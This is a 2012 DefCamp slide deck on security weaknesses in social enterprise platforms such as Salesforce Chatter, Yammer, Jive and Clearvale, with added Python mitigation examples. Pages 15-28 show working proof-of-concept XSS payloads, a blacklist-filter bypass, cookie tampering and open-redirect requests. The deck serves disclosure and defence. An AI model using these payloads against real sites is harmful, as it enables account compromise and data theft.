Page 1: Social Enterprise Rises! …and so are the Risks - DefCamp 2012

Social Enterprise Software Rises!

…and so are the Risks

Marian Ventuneac

[email protected]

@mventuneac

Page 2

An Introduction to Web Application Security Risks

About myself

Security Architect

International presenter

Member of OWASP and ISACA global organizations

OWASP Ireland Limerick Chapter Leader

https://www.owasp.org/index.php/Ireland-Limerick

Security Researcher, PhD, MEng

http://www.ventuneac.net

http://secureappdev.blogspot.com

http://dcsl.ul.ie

Page 3

Agenda

Social Enterprise Software: What, Why, and How?

Social Enterprise Software & Risks

Thoughts on Calculated Risk

Social Enterprise Software & Risks (some case studies)

Final Thoughts

Page 4

Social Enterprise Software: What?

Social Enterprise / Social Enterprise Networks / Social Enterprise Software

Enterprise solutions providing Facebook-like social networking functionality

‘social networking’ + ‘enterprise software’ = ‘social enterprise networking’

Page 5

Social Enterprise Software: Why?

Improve communication and increase work efficiency

internal collaboration

establish teams, communities or informal groups

share knowledge and learn from other people's experiences

social networking

external collaboration with partners

Used by employees and by external customers, suppliers, partners

Page 6

Social Enterprise Software: Deployment models

On-premise solutions

Deployed inside the enterprise network, usually controlled and managed by the client

Public Cloud-based solutions

Software as a Service (SaaS) - hosted and administered by the vendor

Hybrid deployments

Usually open to allow external collaboration

customers, suppliers, third-party contractors, etc

Page 7

Social Enterprise Software: Some of the Risks

Potential loss of enterprise data

Understand what type of data needs to be uploaded there

Do you know/control what data is actually being shared?

Exploitation of common application vulnerabilities

Phishing attacks, social engineering

Viruses and malware

Cloud-based solutions – various compliance and security concerns

Do you know where your data is stored?

Page 8

Common Strategies for Risk Mitigation

Vendor/supplier due diligence

Security policies (generic/dedicated)

Security processes & procedures

Control the data being shared (data classification)

Verify the identity of users accessing the data (authentication)

Control user access to data

Approve/create/lock user accounts (account management)

Remote wipe (for mobile devices – smartphones, tablets, etc)

Page 9

Calculated Risks

Page 10

Calculated Risks (cont)

Business requirement:

WE (the company) need social enterprise software X for Y and Z reasons.

IT Security (most likely take on it):

Scenario 1: No, there is too much risk to take!

Scenario 2: Yes - We trust our partners and their choices.

Scenario 3: Yes - IF Business ASSUMES ALL THE RISKS…

Scenario 4: Let’s take a closer look at it…

Scenario 5: Yes - the vendor is big enough and we can trust it (= the vendor takes application security seriously)

Page 11

Let’s Take a Closer Look

Software defects leading to exploitation of security vulnerabilities

OWASP Top 10 Security Risks

CWE/SANS Top 25 Programming Errors

Vendor size – a plus, but doesn’t guarantee the chosen solution is vulnerability free

It is safe to assume that no application is 100% secure

If anyone claims such a thing, can they provide reasonable proof?

Page 12

Let’s Take a Closer Look (cont)

Trust but verify

Reach an agreement to test the chosen solution in a suitable environment (ideally prior to any contracts being signed)

Manual security testing

Automated security testing

Responsible disclosure

Most likely you will not be disappointed

Page 13

The Closer Look (cont)

A practical take on assessing the security of social enterprise software solutions

Some of the chosen ones

Page 14

The Closer Look (cont)

Assessment criteria including tests for

Cross-Site Scripting (XSS)

Insecure Direct Object Reference

Security Misconfiguration

Failure to Restrict URL Access

Unvalidated Redirects and Forwards

Logical Flaws

Page 15

Blogtronix Enterprise

Blogtronix Enterprise v4.0.4179 (on-premise) and SaaS

CVE-2011-1039 - Multiple XSS Vulnerabilities

Persistent (partially) XSS via Search functionality (auth. user)

HTTP request:

http://test_site/Home/pages/search/?search=<script>alert(document.cookie)</script>&sub=1&tab=0

HTTP response:

<a href="/Home/pages/search/?search=%3cscript%3ealert(document.cookie)%3b&amp;sub=1&amp;tab=0"> <script>alert(docume...</a> </span> <span style=“

Page 16

Blogtronix Enterprise (cont)

CVE-2011-1039 - Multiple XSS Vulnerabilities

Reflected XSS in login page via arbitrary parameter

HTTP request:

https://test_site/pages/login/?a"'><script>alert(document.cookie)</script>

HTTP response:

<form method="post" action="/pages/login/?a"'><script>alert(document.cookie)</script>" id="aspnetForm">

Multiple Reflected XSS via existing and arbitrary parameters of existing resources

Page 17

Blogtronix Enterprise (cont)

Insecure Direct Object Reference (variant)

Valid user A can potentially impersonate another user B

Tamper with the value of the userAccountID_http://test_site/ cookie (ASP.NET GUID)

1. At login time, replace the value of the userAccountID_ cookie with the one matching user B

2. Do something noticeable (post a message in group X) & log out

3. As authenticated user A, review user B’s recent activity – user B appears as a recent visitor of group X
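One mitigation for the cookie-tampering step above, as an added example that is not code from Blogtronix or the deck: the server issues the account id together with an HMAC tag and rejects any cookie whose tag fails to verify, so a swapped-in GUID yields no identity at all. The key, the GUIDs and the function names are constructed for this illustration.

```python
import hashlib
import hmac
import secrets

# Constructed server-side key for this example; a deployment loads it from protected config
SERVER_KEY = secrets.token_bytes(32)

def issue_account_cookie(account_id, key=SERVER_KEY):
    """Value for a userAccountID-style cookie: the id plus an HMAC-SHA256 tag over it."""
    tag = hmac.new(key, account_id.encode("utf-8"), hashlib.sha256).hexdigest()
    return f"{account_id}.{tag}"

def verify_account_cookie(cookie_value, key=SERVER_KEY):
    """Return the account id the server issued, or None if the value was altered."""
    account_id, sep, tag = cookie_value.rpartition(".")
    if not sep or not account_id:
        return None  # unsigned value, e.g. a bare GUID written by the client
    expected = hmac.new(key, account_id.encode("utf-8"), hashlib.sha256).hexdigest()
    # Constant-time comparison so the verifier itself leaks nothing about the tag
    if not hmac.compare_digest(expected, tag):
        return None
    return account_id

# Constructed identifiers standing in for the ASP.NET GUIDs on the slide
USER_A = "11111111-aaaa-4aaa-8aaa-111111111111"
USER_B = "22222222-bbbb-4bbb-8bbb-222222222222"

def swap_account_id(cookie_value, other_account_id):
    """Model the slide's tampering step (keep the tag, replace the id) to exercise the check."""
    _, _, tag = cookie_value.rpartition(".")
    return f"{other_account_id}.{tag}"

if __name__ == "__main__":
    issued = issue_account_cookie(USER_A)
    print(verify_account_cookie(issued))                           # USER_A
    print(verify_account_cookie(swap_account_id(issued, USER_B)))  # None
    print(verify_account_cookie(USER_B))                           # None
```

Keeping the account id out of client-writable storage altogether and resolving it from a server-side session is the stronger design; the signed cookie is the minimal fix for the pattern shown.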

Page 18

Blogtronix Enterprise (cont)

Security Misconfiguration

Enumerate valid user IDs

Unauthenticated attacker checks for https://test_site/users/user_id

if user_id exists, redirected to login

if not, a custom error is displayed

Enumerate valid groups

Unauthenticated attacker checks for https://test_site/group_id/pages/people/

if group_id exists, redirected to login

if not, a custom error is displayed

Page 19

Blogtronix Enterprise (cont)

Improper Error Handling

Page 20

Blogtronix Enterprise (cont)

CVE-2011-1040 Unvalidated Redirects

https://test_site/pages/login/?ReturnUrl=http%3a%2f%2fwww.google.co.uk%2f

Once the user logs in, he/she gets redirected to the resource previously stated via the ReturnUrl parameter

CVE-2011-1041 Failure to restrict access to protected resources

Attacker knows hashed user ID and name of uploaded file => file can be accessed without auth.

Attacker knows hashed user ID => user profile picture can be accessed without auth.
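A validator for the ReturnUrl parameter behind CVE-2011-1040, added here as an example rather than code from the deck or the vendor: it accepts only a same-site absolute path and sends everything else (a scheme or host, a protocol-relative "//" or backslash prefix, control characters, or an encoded value that decodes to one of those) to a fixed landing page. The function names and DEFAULT_LANDING are assumptions.

```python
from urllib.parse import unquote, urlsplit

DEFAULT_LANDING = "/"  # fixed post-login page used whenever ReturnUrl is rejected

def _is_local_path(target):
    """True only for an absolute path on this site, e.g. /Home/pages/search/?sub=1."""
    if not target.startswith("/") or target.startswith("//"):
        return False  # "//host" is protocol-relative and leaves the site
    if "\\" in target:
        return False  # browsers treat "\" as "/", so "/\host" leaves the site too
    if any(ord(c) < 0x21 or ord(c) == 0x7F for c in target):
        return False  # whitespace and control characters never belong in a target
    parts = urlsplit(target)
    return not parts.scheme and not parts.netloc

def safe_return_url(return_url):
    """Return return_url if it is safe to redirect to, otherwise DEFAULT_LANDING.

    The raw value and its percent-decoded form must both pass, so "/%2fhost"
    cannot slip through a framework that decodes the parameter a second time.
    """
    if not return_url:
        return DEFAULT_LANDING
    if _is_local_path(return_url) and _is_local_path(unquote(return_url)):
        return return_url
    return DEFAULT_LANDING

if __name__ == "__main__":
    # Constructed inputs: the slide's external target and a few of its close relatives
    for candidate in ("/Home/pages/search/?sub=1&tab=0", "http://www.google.co.uk/",
                      "//www.google.co.uk/", "/%2fwww.google.co.uk", "/\\www.google.co.uk"):
        print(repr(candidate), "->", safe_return_url(candidate))
```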

Page 21

Salesforce Chatter SaaS

Multiple persistent XSS vulnerabilities

via user profile first & last name

<a href="/005D00000022Ouw" class="entityLink" title="Adam" onmouseover="alert(1)" Cole">Adam&quot; onmouseover=&quot;alert(1)&quot; Cole</a>

via group name

<a href="/0F9D0000000PPwz" class="entityLink" title="test_group" onmouseover="alert(3)"">test_group&quot; onmouseover=&quot;alert(3)&quot;</a>

Page 22

Salesforce Chatter SaaS (cont)

Improper User Input Validation

File Sharing - CR LF symbols accepted into file title (via SaaS solution)

POST /mobile/direct/23.0/005D0000001yD7B/feed_items.json HTTP/1.1
Host: eu1.salesforce.com

Content-Disposition: form-data; name="title"

arv_test52%0a%0d%0a

Page 23

Salesforce Chatter Desktop

Improper Error Handling leading to Information Disclosure

submitting comments for nonexistent posts

HTTP POST request: /mobile/direct/23.0/0D5D00000000000/comments.json HTTP/1.1

Error: {"status":404,"msg":"NoDataFoundException: ORA-20001: \nORA-06512: at \"DOPEY.CFEEDCOMMENT\", line 149\nORA-06512: at \"DOPEY.CFEEDCOMMENT\", line 253\nORA-06512: at line 1\n: {call cFeedComment.insert_feedcomments(?,?,?,?,?,?,?,?,?,?,?,?,?)})}"}

attempting to ‘like’ a nonexistent post

HTTP POST request: /mobile/direct/23.0/0D5D00000000000/like.json HTTP/1.1

Error: {"status":404,"msg":"NoDataFoundException: ORA-20001: \nORA-06512: at \"DOPEY.CFEEDLIKE\", line 156\nORA-06512: at \"DOPEY.CFEEDLIKE\", line 217\nORA-06512: at \"DOPEY.CFEEDLIKE\", line 118\nORA-06512: at line 1\n: {call cFeedLike.insert_detail(?,?,?,?,?,?,?,?)})}"}

Page 24

Yammer

Persistent XSS via group name

HTTP POST request:

/ventuneac.net/groups HTTP/1.1
Host: www.yammer.com

-----------------------------295562556131627
Content-Disposition: form-data; name="group[name]"

a4" onmouseover="alert(4)"
-----------------------------295562556131627

HTTP response (home page):

GET /ventuneac.net/ HTTP/1.1
Host: www.yammer.com

<a href="/ventuneac.net/groups/a4onmouseoveralert4" class="nav-list-link" title="a4" onmouseover="alert(4)" group">

Page 25

Jive

Persistent XSS via group name (create/edit)

HTTP POST request:

POST /create-group.jspa HTTP/1.1
Host: ventuneac.jiveon.com

-----------------------------215202979014924
Content-Disposition: form-data; name="description"

group2"><script>alert(1)</script>
-----------------------------215202979014924

HTTP response (load group from Places):

GET /groups/group2 HTTP/1.1
Host: ventuneac.jiveon.com

<meta name="description" content="group2"><script>alert(1)</script>" />

Page 26

BroadVision Clearvale SaaS

Multiple persistent XSS vulnerabilities

via user profile first & last name & search page

<a href="http://vmarian.clearvale.com/pg/profile/3" rel="me" . title="m" style="xss:expr/*XSS*/ession(document.location('http://www.google.co.uk'))">m&quot; style=&quot;xss:expr/*XS...</a>

via group name & search page

<a href="http://vmarian.clearvale.com/pg/groups/23/aaaa-stylexssexprxssessiondocumentlocationhttpwwwgooglecouk/" title="aaa"><a style="xss:expr/*XSS*/ession(document.location('http://www.google.co.uk'))">aaa&quot;&gt;&lt;a style=&quot;xss:exp...</a>

Page 27

BroadVision Clearvale SaaS (cont)

The broken fix for the user profile name XSS issue

Black-list user input validation

style followed by = becomes style00 (style=, style =, etc)

document.location followed by ( becomes document.location00

alert followed by ( becomes 00

/* becomes /0*

*/ becomes *0/

Improper output escaping, for the first instance only

Page 28

BroadVision Clearvale SaaS (cont)

The broken fix for the user profile name XSS issue

Bypassing the Clearvale XSS filter

XSS payload:

firstname: m" style

lastname: ="/**/;xss:expr/**/ession(alert/**/('aaa'))

HTTP response:

<a href="http://vmarian.clearvale.com/pg/profile/3" rel="me" . title="m" style ="/0**0/;xss:expr/**/ession(alert/**/('aaa')) ">m&quot; style =&quot;/0**0/;xss:...</a>
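To show why the blacklist on pages 27 and 28 fails where output encoding does not, here is an added example (not Clearvale's code or the deck's): it reconstructs the five listed rules, renders the profile link both ways, and reports any attribute in the resulting tag that the template itself did not emit. The rules' exact semantics, the function names and the attribute check are assumptions; the two payloads are the ones the slides show.

```python
import html
import re

def clearvale_blacklist(value):
    # Reconstruction of the five rules listed on the slide; exact semantics assumed
    value = re.sub(r"style\s*=", "style00", value)
    value = value.replace("document.location(", "document.location00")
    value = value.replace("alert(", "00")
    return value.replace("/*", "/0*").replace("*/", "*0/")

def render_link_blacklist(profile_url, first, last):
    # Broken pattern: filter the input, then interpolate it raw into an attribute
    name = f"{clearvale_blacklist(first)} {clearvale_blacklist(last)}"
    return f'<a href="{profile_url}" rel="me" title="{name}">{html.escape(name)}</a>'

def render_link_encoded(profile_url, first, last):
    # Hardened pattern: keep the name as data and encode it for each output context
    name = f"{first} {last}"
    attr = html.escape(name, quote=True)  # '"' and "'" become entities inside the attribute
    return (f'<a href="{html.escape(profile_url, quote=True)}" rel="me" '
            f'title="{attr}">{html.escape(name)}</a>')

ATTR_RE = re.compile(r'([A-Za-z-]+)\s*=\s*"([^"]*)"')

def injected_attributes(rendered, expected=("href", "rel", "title")):
    """Attribute names in the opening <a> tag that the template never emits."""
    tag = re.match(r"<a\b([^>]*)>", rendered)
    if tag is None:
        return ["<malformed tag>"]
    return [n for n, _ in ATTR_RE.findall(tag.group(1)) if n.lower() not in expected]

# Constructed inputs: the original payload and the split bypass payload from the slides
URL = "http://vmarian.clearvale.com/pg/profile/3"
ORIGINAL = ('m" style="xss:expr/*XSS*/ession(document.location(\'http://www.google.co.uk\'))', "")
BYPASS = ('m" style', '="/**/;xss:expr/**/ession(alert/**/(\'aaa\'))')

if __name__ == "__main__":
    for first, last in (ORIGINAL, BYPASS):
        print(injected_attributes(render_link_blacklist(URL, first, last)),
              injected_attributes(render_link_encoded(URL, first, last)))
```

The blacklist stops the first payload only because that payload happens to match its patterns; the encoded rendering needs no knowledge of payloads at all.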

Page 29

Knowing What ‘private’ Really Means

Social Enterprise Software usually provides document sharing/publishing functionality

Private (not shared with anyone – default option)

Shared with private (locked) groups/members

Shared with public groups

Shared with everyone (shared via public link)

In certain conditions, the private documents can become… less private

Page 30

AntiVirus & anti-malware file scanning

BroadVision Clearvale has a built-in AV scanning engine

The rest of the tested solutions currently lack such capabilities

Yammer and Salesforce plan to add AV file scanning

No malicious files were used for testing AV capabilities

Page 31

The Closer Look: Summary

Common security vulnerabilities - can be easily exploited

User-shared information is not properly validated and sanitised

A malicious user can inject JavaScript malware into his/her profile/groups/actions/etc

Where such user-controlled data is seen/accessed by other users, their accounts can easily get compromised

Exploitation of such vulnerabilities could severely compromise the security of enterprise data

Page 32

Final Thoughts

Even if the vendor is a market leader, it doesn’t necessarily mean they get application security right

Dare to ask for proof of application security

Trust but verify

Vendor due diligence, social enterprise software related security policies & security procedures, etc

Interested in this kind of benchmark?

OWASP Security Baseline Project

https://www.owasp.org/index.php/OWASP_Security_Baseline_Project

Page 33

Thank You

[email protected]

@mventuneac